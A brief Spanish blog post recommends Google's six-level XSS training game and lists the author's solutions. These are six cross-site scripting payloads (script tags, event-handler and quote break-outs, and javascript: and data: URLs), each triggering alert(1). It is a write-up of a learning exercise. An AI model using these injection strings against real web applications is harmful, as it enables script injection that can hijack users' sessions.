martes, 3 de junio de 2014

Juego XSS de Google

Hace poco vi un post en MuySeguridad Y no dude en intentar pasar el juego que publico Google, tiene una documentacion muy buena que la pueden encontrar aqui:

https://www.google.com/about/appsecurity/learning/xss/index.html

Son nada mas 6 niveles:




En los 6 niveles te enseñan los ataques mas famosos XSS reflejado, XSS Persistente y DOM XSS.

Es muy divertido de jugarlo, se los recomiendo aqui les dejo el link:

https://xss-game.appspot.com/ 


Soluciones que encontre:

1.- <script>alert(1)</script>
2.- <h1 onclick="alert(1)">probando</h1>
3.- x' onerror="alert(1)" />; var a= "
4.- x'),alert('1
5.- javascript:alert(1)
6.- data:text/plain,alert(1)

No hay comentarios:

Publicar un comentario en la entrada